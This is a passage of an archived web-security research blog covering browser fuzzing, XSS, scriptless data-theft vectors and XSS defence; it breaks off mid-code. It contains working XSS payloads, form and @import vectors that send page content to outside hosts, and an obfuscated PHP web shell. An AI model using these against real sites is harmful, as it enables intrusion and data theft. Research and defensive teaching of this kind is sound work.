Data enumeration tutorial in Shazzer

Friday, 10 February 2012

Over the last few days I’ve finally fixed a data enumeration bug that was haunting a new feature in Shazzer. Originally Shazzer just mutated one character at a time to discover characters which influenced the fuzz vectors in interesting ways. I decided to expand that to include data. I called the feature “datasets” because you could assign a placeholder to a set of data. Using this placeholder it then becomes easy for you to generate a vector that checks each value in the dataset and not only that but how that data relates to another dataset.

So what does that actually mean when it comes to vector creation? Here is an example enumeration vector:

<*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*>

*datahtmlelements* refers to a dataset and in this instance we are talking about html elements, so the placeholder will be replaced by “br”, “b”, “html” and so on, the same this will happen to *datahtmlattributes* but this time using each attribute. Shazzer checks your vector for how many instances of placeholders you have and then automatically creates a loop within all the data so it enumerates each dataset within a nested loop of up to 5 separate datasets. The amount of data is split between a maximum of 10,000 iterations so your data will all be enumerated no matter how big the total iterations are it will just take a long time for a lot of nested datasets spacer

You can see in the vector that the placeholders are used more than once this enables you to log any interesting results, so here we use the customLog function in Shazzer to send the html element and attribute that executes. Other logging functions are available and are listed in the preparation code when you create a vector.

Steps to create an enumeration vector

1. Check datasets for which data you would like to enumerate. You can create your own dataset if the one you require doesn’t exist.
2. Click create and select “Data enumeration” from the vector type drop down.
3. Give it a nice descriptive name and some keywords to find the vector.
4. You don’t actually need to modify the preparation code unless you need to log something that doesn’t execute like CSS values for instance.
5. Construct your vector by clicking and data placeholders at the bottom and craft you code as if you’re in a loop of all the data structures you use.
6. Once your vector is complete you can now fuzz the vector by choosing it from the “Fuzz vectors” list. Once you’ve found your vector you can select a doctype then click “Fuzz all” to begin fuzzing.

In future you will be able to share these enumeration vectors between your twitter followers in order to distribute the workload between friends to help scan large datasets. Happy fuzzing!

Posted in fuzzing, javascript, php, Security, Shazzer, xss | No Comments »

Introducing Shazzer: A shared online fuzzer

Thursday, 12 January 2012

I lost inspiration for coding a while ago and had this idea I was sitting on for a while, I’m often stuck at the design stage before I write a line of code and I will refuse to continue without a clear picture in my head on how an app is going to work. After the Christmas break I got my inspiration back and started to formulate pretty quickly how Shazzer might work. Once I was happy with the design then I started to code it pretty quickly, it was like a jigsaw and everything just fitted nicely together.

So what the hell is it I hear you ask? Shazzer allows you to perform client based fuzzing and share the results with the world. It scans from 0-100000 characters in a couple of seconds (depending on the vector) and allows you to build different vectors and preparation code. When you think about fuzzing especially about behaviour based fuzzing, there are too many combinations for you to handle on your own. You need to scan every browser version, every os, every charset, every doc mode (for ie) and so on, it’s an impossible amount of data to get through especially when time is limited. At the moment it’s limited to one character mutation and designed for behaviour based fuzzing rather than finding crashes (that will come later).

Shazzer is useful in asking simple questions, for example “What characters are allowed after an attribute name in IE9.0?“. The idea is to construct clever vectors that discover this information and then use your browser to scan the information and ask your friends or colleagues to scan using their browser. The end goal is then to use this information to file bugs, find holes in HTML filters or simply to discover the differences between the various browser versions.

Constructing a vector

To make your own vectors the first thing you need to do is search to see if the vector your are looking for already exists there’s no point reinventing the wheel. Then hit create (after you’ve logged in). The description should be clear and concise and no more than 50 characters, also consider it will be the url of your vector so keep it short and to the point. Keywords allow you to assign search terms for your vector, include any keywords that you think are relevant to your vector such as “anchor, XSS, href” if you are checking the anchor href for different characters. The preparation code allows to modify how the logging works, for JS execution vectors you shouldn’t need to modify this but for HTML/CSS based checks you should modify it to detect if the vector was successful. Consider the following example:

<span id="fuzzelement*num*" style="*chr*color:#000;">>/span>

Here the vector wants to check what characters are allowed before the property “color” in CSS but as this vector doesn’t execute JavaScript you will have to manually check each vector. You do this by modifying the preparation code just below the start of the complete function. Like so:


for(var i=from;i<to;i++) {
try { if(document.getElementById('fuzzelement'+i).style.color.length) {
ids.push(i);
}
}catch(e){}
}

This script takes advantage of the predefined global variables of the fuzzer “from” is where Shazzer is starting from such as “0″ or “10000″ and to is the ending range it’s scanning. Then we check if the color property has been set on the target element and if so add the chr number to the ids. The try catch block stops the fuzz script from breaking if the object doesn’t exist.

For the most part you shouldn’t have to modify the preparation code and mainly you just work on adding new vectors. Vectors work using placeholders *chr* indicates the character and *num* is the character code. If we use the “characters after attribute” as an example from earlier, you simply create some HTML that executes the log and place the *chr* where you want to check. For example:


`"'><img src="/img/spacer.gif">

At the beginning of the example you will notice that there are quotes and a closing “>” this is to prevent the vectors from overlapping when an attribute is constructed from the fuzz data. The character we are fuzzing appears after onerror and is indicated by *chr*, when the onerror executes the log function is called which is predefined in the preparation code and the argument sent is the character code indicated by *num* this vector will now work on any browser or charset or range etc that any user chooses and allow you to see the result spacer

Fuzzing Samples

Here are a few examples for you to play with:
Characters allowed before a JavaScript function
Characters that close a HTML comment

Have a go with Shazzer yourself and have fun!

Posted in fuzzing, javascript, php, Security, xss | 3 Comments »

Breaking feeds

Wednesday, 4 January 2012

This should break my feed and anyone else who syndicates my feed and doesn’t filter spacer

0x05

That’s it LOL. Hope you enjoyed it but I doubt you read it. spacer



Posted in php, Security | 6 Comments »

HTML scriptless attacks

Wednesday, 21 December 2011

Following up on @lcamtuf’s post about a “post xss” world. I thought I’d chip in with some vectors he missed. The textarea consumption technique he mentioned isn’t new and wasn’t invented by “Eric Y. Chen, Sergey Gorbaty, Astha Singhal, and Colin Jackson.” it was openly discussed on sla.ckers for many years (as usual) but anyway lets discuss vectors.

Button as a scriptless vector

Using button is interesting because of two interesting specification changes in HTML5, one is the fact that the default type for a button is a submit and secondly the formaction attribute allows you to change it’s parent form action. In addition button consumes HTML, allowing you store any html after button until the next or non existent closing button tag. Example vector:


<button name=xss type=submit formaction=//evil>I get consumed!

Option as a scriptless vector

A strange fact is option also consumes HTML, pretty obvious when you think about it but could lead to info disclosure like the button example.


<form action=//evil><select name=xss><option><b>steal me!</b>

@import as a scriptless vector

The CSS specification states that @import should continue parsing a url until it encounters a ending “;”. This means you can use it to consume HTML. A vector like the following can steal data:


<style>@import//hackvertor.co.uk?
<b>steal me!</b>;

Noscript scriptless vector

Another interesting way to defeat XSS filters is to use the noscript tag as demonstrated by my attack against Caja’s HTML filter.


<noscript><form action=google.com><input type=submit style="position:absolute;left:0;top:0;%;%;" type=submit value=pwnd><textarea name=contents></noscript>

It uses the noscript tag to generate a textarea that when enabled (because of no javascript present) consumes the HTML after. This can also be initiated using security=restricted on IE or the new HTML5 br sandbox option. Original report.

Using window.name via base target

You can also use the target attribute to assign the contents of the HTML after to the window name and then later retrieve it x-domain after a user clicks an external link.


<base target='
steal me'<b>test</b>

So here we inject a base tag with a target attribute, the target then assigns everything after ‘ to the window.name and then can be retrieved when the user clicks to the external server.

That’s all folks.

Posted in Security, xss | 7 Comments »

NULLs in entities in Firefox

Monday, 5 December 2011

HTML5 decided to introduce a load of new entities, I dunno why maybe they thought it wasn’t hard enough to protect against the original ones we had already. Anyway Firefox has a bug or “feature” that allows NULLS inside the entities. I tweeted it but if I don’t post it here it will probably be lost in a sea of tweets. You can place NULLs before the “&” or before the “;” which allows you to construct a pretty weird entity.


javascript&0x00colon;
javascript&colon0x00;

These obviously work inside a anchor href and I think in addition FF requires the HTML5 doctype.

Posted in javascript, Security | No Comments »

staticHTML property

Tuesday, 29 November 2011

The static HTML property allows you to get/set filtered HTML directly on the DOM object you’re using. The browser vendors don’t support this property yet, IE has a toStaticHTML function and Firefox via the Noscript plugin emulates toStaticHTML but doesn’t allow you to set/get directly, so I decided to create a JavaScript version that can provide it until the vendors implement it. As I was updating HTMLReg and CSSReg with some new features I thought this might be a good time to add support for it. The problem with static HTML is you have no way to protect an element from overlapping another element. The traditional way HTMLReg protects against this problem is to have a container element that is restricted via CSS to certain dimensions and it’s overflow hidden thus not allowing you to break out of that element via absolute positioning etc.

It’s not possible to have a container for every element so I couldn’t figure out a way to stop this overlapping problem, so each time an element is modified you cannot alter it’s dimensions or position. If you want to have a section of your HTML that you want to allow user input to alter dimensions then you can place a container div like so:


<div id="staticHTML" style="border:1px solid #ccc;position:relative;px;px;overflow:hidden;"></div>

This way the modified HTML can’t break out of this element so any modification of staticHTML inside this element should be safe. You’d need to modify the HTMLReg could when you include it on your site in order to modify dimensions nand positioning like so:


if(Element.prototype && !Element.prototype.staticHTML) {
window.Object.defineProperty(Element.prototype, 'staticHTML', {
get: function() {
HTMLReg.setAppID('staticHTML');
HTMLReg.disablePositioning = false;//changed this line!
return HTMLReg.parse(this.innerHTML+'');
},
set: function(val) {
HTMLReg.setAppID('staticHTML');
HTMLReg.disablePositioning = false;//changed this line!
this.innerHTML = HTMLReg.parse(val+'');
}
});
}

To use the property itself you just read and write to the staticHTML property of the DOM object. You can read the staticHTML property without actually altering the DOM object’s innerHTML. Examples below:

document.getElementById('x').staticHTML='<b>test</b>';
alert(document.getElementById('x').staticHTML)

Finally there is the demo and the usual question. Can you break it?
Static HTML demo

Update….

Oh yeah I got it working in IE7 :O how awesome is that? spacer via htc

Posted in CSSReg, DOM, HTMLReg, javascript, Security, xss | No Comments »

Non-alpha JavaScript and PHP slides

Thursday, 17 November 2011

I had fun at OWASP Manchester, my talk went really well. Getting more confidence with talks now I think. I have a tendency to rush through and get ahead slightly sometimes but overall I did much better and had some great feedback along with some very interesting questions. Enjoy the slides!

Here are my non-alphanumeric JavaScript & PHP slides (powerpoint) (pdf)

Posted in javascript, php, Security | 3 Comments »

We need @ urls

Monday, 17 October 2011

Just thought I’d post the obvious and state we need @ urls. At the moment when using @ the browser assumes you want to use ftp on the site in question but I propose when using a url that begins with @ it should default to your chosen social network. @uid would resolve to twitter.com/uid or facebook.com/uid. Doesn’t that make sense? Look at the adverts on TV when they say follow us on twitter for example @ourid doesn’t really make sense to the average user does it? But if you could type that in directly in the browser and it could prompt you to follow the user then suddenly it’s much more friendly and usable.

How it could work

The @ url would default to your chosen social network but display icons next to the typed in uid which would allow you to choose facebook, twitter or a different social network. If you hit return it would use your default.

spacer

The social network could configure the appearance of the icon as well as the user id url to be sent to. Something like:


<meta name="social network" content="text='Add twitter to your social networks?',icon='https://twitter.com/images/someicon.png',url='https://twitter.com/%s'" />

Posted in ideas | 12 Comments »

Non alphanumeric code in PHP

Thursday, 22 September 2011

So a small php shell was tweeted around and it inspired me to investigate a way to execute non-alphanumeric code. First off I started with the idea of using octal escapes in PHP and constructing the escape so for example: \107 is “G” if I could construct the “107″ and add the backslash to the beginning maybe I could construct “G”. It worked like this:


$_=+"";
$_=(++$_)+(++$_)+(++$_)+(++$_);
$__=+"";
$__++;
$___=$_*$_+$__+$__+$__+$__+$__+$__+$__;//107
$___="\\$___";

But there was no way to evaluate the escape once it was constructed without using alphanum chars. So I was stumped.
Then I had a brain wave, php automatically does a string conversion for arrays and converts them to “Array” when accessed as a string. I had “A”, “r”, “r” etc but I really needed “GET” in order to create a nice small non-alpha shell.

Onto the second technique, PHP allows you to use bitwise operators on strings spacer

'a'|'b';//c!

We can make new characters by combining others, but I only had a limited set to work with. A simple for loop later I combined the characters to create “GET” and thus make our non-alphanum small PHP shell spacer


<?
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"0x06").($_[+""]|"0x05").($_[+""]^"0x15");
?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>

The first part converts a string into an array by attempting to assign to “0″ position of the string. Then I make sure the array is a string. Then I use “A” from array with bitwise operators to construct “G”, “E” and “T” using the characters “A”|0×6, “A”|0×5 and “A^0×15″. There you have it,you could even generate non-alpha code without using GET quite easily by producing different characters until you get an eval method.

To call the shell you’d use:
?_=shell_exec&__=whoami

Don’t forget in order to analyze php code use RIPS if you ever encounter this in the wild.

Posted in php, Security | 20 Comments »

Protecting against XSS

Monday, 12 September 2011

The problem as I see it

Where to start? Let me start by telling you that most of the books you read are wrong. The code samples you copy of the internet to do a specific task are wrong (the wrong way to handle a GET request), the function you copied from that work colleague who in turn copied from a forum is wrong (the wrong way to handle redirects). Start to question everything. Maybe this blog post is wrong spacer this is the kind of mindset you require in order to protect your sites from XSS. You as a developer need to start thinking more about your code. If a article you are reading contains stuff like echo $_GET or Response.Write without filtering then it’s time to close that article.

Are frameworks the answer? I think in my honest opinion no. Yes a framework might prevent XSS in the short term but in the long term the framework code will be proven to contain mistakes as it evolves and thus when it is exploited it will be more severe than if you wrote the code yourself. Why more severe? A framework hole can be easily automated since many sites share the same codebase, if you wrote your own filtering code than an attacker would be able to exploit the individual site but find it hard to automate a range of sites using different filtering methods. This is one of the main reasons the internet works today, not because everything is secure just because everything is different.

One of the arguments I hear is that a developer can’t be trusted to create a perfect filtering system for a site and using a framework ensures the developer follows best guidelines. I disagree, developers are intelligent they write code and understand code, if you can build a system you can protect it because you’re in the best position to.

How to handle input

When you handle user input just think to yourself “a number is a vector”, imagine a site that renders a image server side and allows you to choose the width and height of the graphic, if you don’t think a number is a vector then you might not put any restrictions on the width and height of the generated graphic but what happens when an attacker requests a 100000×100000 graphic? If you’re code doesn’t handle the maximum and minimum inputs then an attacker can DOS your server with multiple requests. The lesson is not to be lazy about each input you handle, you need to make sure each value is validated correctly.

The process should be as follows.
1. Validate type – Ensure the value your are getting is what you were expecting.
2. Whitelist – Remove any characters that should not be in the value by providing the only characters that should.
3. Validate Length – Always validate the length of the input even when the value isn’t being placed in the database. The less that an attacker has to work with the better.
4. Restrict – Refine what’s allowed within the range of characters you allow. For example is the minimum value 5?
5. Escape – Depending on context (where your variable is on the page) escape correctly.

You can make things easier for yourself by placing these methods into a function or a class but don’t overcomplicate keep each method as simple as possible and be very careful and descriptive with your function names to avoid confusion.

HTML context

Lets look at an example of the method above with a code sample in PHP.

<?php
$x = (string) $_GET['x']; //ensure we get a string not array
$x = preg_replace("/[^\w]/","", $x); //remove any characters that are not a-z, A-Z, 0-9 or _
$x = substr($x, 0, 10);//restrict to a maximum of 10 characters
if(!preg_match("/^a/i", $x)) {//this value must only begin with a or A
	$x = '';
}
echo '<b>' . htmlentities($x, ENT_QUOTES) . '</b>'; //escape everything according to context of $x
?>

You might be wondering why I used (string) in the code above. Lets try it without it.

Using the following:test.php?x[]=123
Results in: “Warning: substr() expects parameter 1 to be string, array given”

Because of the PHP feature which allows you to pass arrays over a GET request you can create a warning in PHP over unexpected type when trying to whitelist the value. Using type hinting ensures you get the expected type.

Great so we now understand how to restrict and escape a value. Lets look at another context.

Script context

When not in XHTML/XML mode a script tag does not decode HTML entities. If you have a value within a variable inside a script tag, question is what do you escape?

example:

<script>x='value here';</script>

Inside a JavaScript variable like this you have to watch out for the following ‘ and </script> using these vectors it’s possible to XSS the value. The two examples are listed below.

vector 1: ',alert(1),//
vector 2: </script><img src="/img/spacer.gif">

The second example requires no quotes and a lot of developers assume it won’t be executed because it’s still inside a JavaScript variable, this is clearly wrong as it executes because the browser doesn’t know where the script begins and ends correctly.

To escape a value inside a script context you should JavaScript escape the value. The best way of doing this is using unicode escapes, a unicode escape in JavaScript looks like the following:


<script>
alert('\u0061');//"a" in a unicode escape
</script>

You can experiment with unicode escapes using my Hackvertor tool. Please understand how they work as they will be very important to you when understanding how to protect many contexts.

It’s very important you follow the same procedure as before (Validate type, Whitelist, Validate Length, Restrict, Escape) for the specific variable you’re working on but this time we will convert our value into unicode escapes. A simple function to do that is as follows:

<?php
function jsEscape($input) {
	if(strlen($input) == 0) {
		return '';
	}
	$output = '';
	$input = preg_replace("/[^\\x01-\\x7F]/", "", $input);//remove any characters outside the range 0x01-0x7f
	$chars = str_split($input);
	for($i=0;$i<count($chars);$i++) {
		$char = $chars[$i];
		$output .= sprintf("\\u%04x", ord($char));//get the character code and convert to hex and prefix with \u00
	}
	return $output;
}
?>

I’ve purposely designed this function with a few little optimisations missing, for example instead of using unicode you could use hex escapes since we restrict the range of allowed characters, alphanumeric characters are even converted when they could be replaced by their literal characters and new lines/tabs are encoded too when you could use the shorter equivalent. Lets add a line to use a literal tab character instead of \u0009. Why would you want to do this? To reduce the characters sent down the wire.

Code to handle tab:

<?php
if(preg_match("/^\t$/", $char)) {
   $output .= '\\t';
   continue;
}
?>

This converts a tab specifically to “\t”, notice how we separate input and output and by using continue we can skip the input character and override it with something more specific. The full code is now below for clarity.

<?php
function jsEscape($input) {
	if(strlen($input) == 0) {
		return '';
	}
	$output = '';
	$input = preg_replace("/[^\\x01-\\x7F]/", "", $input);
	$chars = str_split($input);
	for($i=0;$i<count($chars);$i++) {
		$char = $chars[$i];
		if(preg_match("/^\t$/", $char)) {
			$output .= '\\t';//don't unicode escape but using a shorter \t instead. Double escape remember!
			continue;//skip a line and move on the the next char
		}
		$output .= sprintf("\\u%04x", ord($char));
        }
        return $output;
}
?>

Exercises for this code:
1. Can you handle characters outside the ascii range?
2. Convert any non dangerous character to their escaped or literal representation.

Script context in XHTML

In the previous section you might have wondered about XHTML when I stated “when not in XHTML/XML mode a script tag does not decode HTML entities”. In XHTML entities can be decoded even inside script blocks! Fortunately the code I provided for that section will handle that since unicode escapes are used. If you followed the exercises in that section did you make the “&” safe? That is something to think about when you are working on XHTML page. In order for XHTML to be used in the browser you have to serve the pages with the correct XHTML header. I recommend you don’t use the XHTML header.

Even though the previous examples still protect you against attack, I will show you a couple of vectors for XHTML sites/


<script>x='&#39;,alert(/This works in XHTML/)//';</script>


<script>x='&apos;,alert(/This also works in XHTML/)//';</script>

This would work in any XML based format, entities can be used to break out of strings and just a simple &lt/ will also do the trick. Don’t use XHTML or if you do unicode escape and don’t allow literal “&”.

JavaScript events

Now you know what happens in XHTML, you might be interested to know it also happens in HTML attributes. Any HTML attribute including events such as onclick will automatically decode entities and use them as if they were literal characters. Best demonstrated with a code example.


<div title="&gt;" id="x">test</div>
<script>
alert(document.getElementById('x').title);
</script>

As you can see instead of the value of the title attribute of the div element returning “&gt;” it returned “>” because it was automatically decoded. This whole process is one of the root causes of XSS, the developer didn’t understand that. Lets look at what happens with a onclick event and a variable of “x”.


<a class="#">

Clicking on the link fired the alert because like XHTML the entities are decoded, when you are in the attribute context you need to do exactly the same as if you were in the XHTML context. Reusing your jsecape function will fully protect you from XSS in attributes and variables like this.

innerHTML context

I hope you’ve grasped the previous concepts because now it’s going to get slightly confusing. If you’re in the script context and you are assigning a value which writes to the dom in some way then the previous rules of escaping break down. Because although you are escaping the value correctly for the context, the context shifts once it’s applied to innerHTML. As always here is an example:


<div id="x"></div>
<script>
//this is bad don't do this with innerHTML
document.getElementById('x').innerHTML='<?php echo jsEscape($_GET['x']);?>';</script>

Even though the string is “\u003c\u0069\u006d\u0067\u0020\u0073\u0072…” and so on it will still cause XSS because the innerHTML write will actually see the decoded characters from the JavaScript string. You need to escape for the HTML context as well as the script context, if you add XHTML to that too then it gets really really complicated. My advice is not to allow HTML when using the innerHTML context, whitelist and restrict your values and use innerText or textContent instead. If you really need HTML inside innerHTML follow the tutorial at the end on how to write a basic HTML filter for innerHTML.

CSS context

The same rules I’ve stated previously apply to CSS, a style block will not decode entities except when in XHTML/XML mode and style attributes will decode HTML entities automatically. This makes protecting against injections in the CSS context hard if you don’t know what you’re doing. In addition to the regular entities, CSS also supports it’s own format of hex escapes. The format is a backslash followed by a hex number of the required character padded optionally with zeros from 2-6 in length (vendors also supported a large amount of zero padding over the 6 length restriction). To see how it looks let use Hackvertor again to build our string.

As you can see there are quite a few combinations you can use, there are more. The CSS specification states that comments can be used and consist of C style /* */ and any hex escape can include a space after the escape to avoid the next character continuing the hex escape. E.g. to CSS \61 \62 \63 is still “abc” regardless of the spaces. Hopefully you’ve read my blog for a while and know about using entities as well as hex escapes or maybe you’ve just realised? Well yeah it’s correct you can use hex escapes, comments and html entities to construct a valid execute css value.

This leaves you with a nightmare scenario with regard to protecting css property values, IE7 and IE7 compat (on newer builds of IE) supports expressions in CSS. Which basically allows you to execute JavaScript code inside CSS values. A simplistic example here:


<div style="xss:expression(open(alert(1)))"></div>

I use the open() function call to avoid the annoying client side DOS of continual alert popups. Anything inside “(” and “)” of the expression is a one line JavaScript call. In the example I use a invalid property called “xss” but it’s more likely to be “color” or “font-family”. Lets take it up a notch and start to encode the CSS value and see what executes. I’ll just encode the “e” of expression to make it easier to follow.


Hex escape:
<div style="xss:\65xpression(open(alert(1)))"></div>
Hex escape with trailing space:
<div style="xss:\65 xpression(open(alert(1)))"></div>
Hex escape with trailing space and zero padded:
<div style="xss:\000065 xpression(open(alert(1)))"></div>
Hex escape with trailing space and zero padded and comment:
<div style="xss:\000065 /*comment*/xpression(open(alert(1)))"></div>
Hex escape with trailing space and zero padded and HTML encoded comment:
<div style="xss:\000065 &#x2f;&#x2a;comment*/xpression(open(alert(1)))"></div>
and finally hex escape with encoded backslash with trailing space and zero padded and HTML encoded comment:
<div style="xss:&#x5c;000065 &#x2f;&#x2a;comment*/xpression(open(alert(1)))"></div>

I’m sure you’ll agree that’s hard to follow and there are literally millions of combinations. Unfortunately you can’t simply hex escape the value and expect it to be safe from injection, since even encoded CSS escapes as you’ve seen can be used as vectors. The option you’re left from a defensive point of view is to whitelist every CSS property value, luckily I’ve already done that with CSS Reg and Norman Hippert kindly converted it to PHP.

Serving your pages

Every single page that’s available on the web for your site should include a doc type and a UTF-8 charset in a meta tag, now we have a shortened HTML5 header we can use the following:


<!doctype html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
... your content ....

This is to prevent charset attacks and E4X vectors and force your document into standards mode on IE which is also important. I also recommend you enforce standards mode by following this blog post from Dave Ross.

Positive matching and filtering HTML

The last section of this long blog post will be how to write you’re own filter. I don’t think I’m the world’s greatest programmer but I think I’ve worked out a cool technique to filtering content using little code and by only matching the content you want you won’t get anything bad. I hope you take the basis of this code and improve it and learn from it. This code is intentially incomplete I wrote a more complete HTML filter called HTMLReg which you can examine if you want to improve this basic filter. But I recommend you try and improve the filter yourself and learn to break it too.

<script>
function yourFilter(input) {
	var output = '' , pos = 0;
	input = input + ''; //ensure we have a string
	function isNewline(chr) {
		return /^[\f\n\r\u000b\u2028\u2029]$/.test(chr);
	}
	function outputSpace(chr) {
		if(!/^\s$/.test(output.slice(-1)) && !isNewline(chr)) { //skip new lines and multiple spaces
			output += chr;
		}
	}
	function outputChars(chrs) {
		output += chrs;
	}
	function error(m) {
		throw {
                  description: m
                };
	}
	function parseHTML() {
		var allowedTags = /^<\/?(?:b|i|strong|s)>/,
			match;
			if(allowedTags.test(input.substr(pos))) {
				match = allowedTags.exec(input.substr(pos));
				if(match === null) {
					error("Invalid tag");
				} else 


gipoco.com is neither affiliated with the authors of this page nor responsible for its contents. This is a safe-cache copy of the original web site.